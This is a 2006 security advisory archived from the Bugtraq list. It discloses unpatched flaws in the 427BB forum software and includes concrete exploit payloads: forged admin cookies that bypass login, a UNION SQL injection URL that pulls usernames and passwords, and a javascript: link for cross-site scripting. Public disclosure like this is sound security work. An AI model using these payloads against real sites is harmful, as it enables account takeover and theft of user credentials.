| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 7 Jan 2006 11:20:33 -0000 From: alex@...ln.com To: bugtraq@...urityfocus.com Subject: [eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS) New eVuln Advisory: 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS) --------------------Summary---------------- Software: 427BB Sowtware's Web Site: http://sourceforge.net/projects/fourtwosevenbb Versions: checked: 2.2 and 2.2.1 Critical Level: Dangerous Type: Multiple Vulnerabilities Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (eVuln.com) Published: 2006.01.07 eVuln ID: EV0018 -----------------Description-------------- 427BB has multiple vulnerabilities. 1. Authentication bypass using modified cookie values. Vulnerabe scripts: login.php getvars.php To authorize any logged-in user forum scripts checks only three cookie values: username authenticated usertype Forum dont make password comparison. 2. 427BB has Multiple SQL Injection Vulnerabilities. For example: Vulnerabe script: showthread.php Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code 3. Arbitrary script code insertion is possible when posting a message containing URL. Vulnerable Script: posts.php Condition: visitor needs to click this link --------------Exploit--------------------- 1. Authentication bypass using modified cookie values. Cookie: username=admin; Cookie: authenticated=1; Cookie: usertype=admin; 2. SQL Injection Example. Need to be logged in as registered user. http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal 3. Arbitrary script code insertion. Posting new message. Message text: [url=javascript:alert(123)]clickme[/url] --------------Solution--------------------- No Patch available. --------------Credit--------------------- Original Advisory: http://evuln.com/vulns/18/summary.html Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Powered by blists - more mailing lists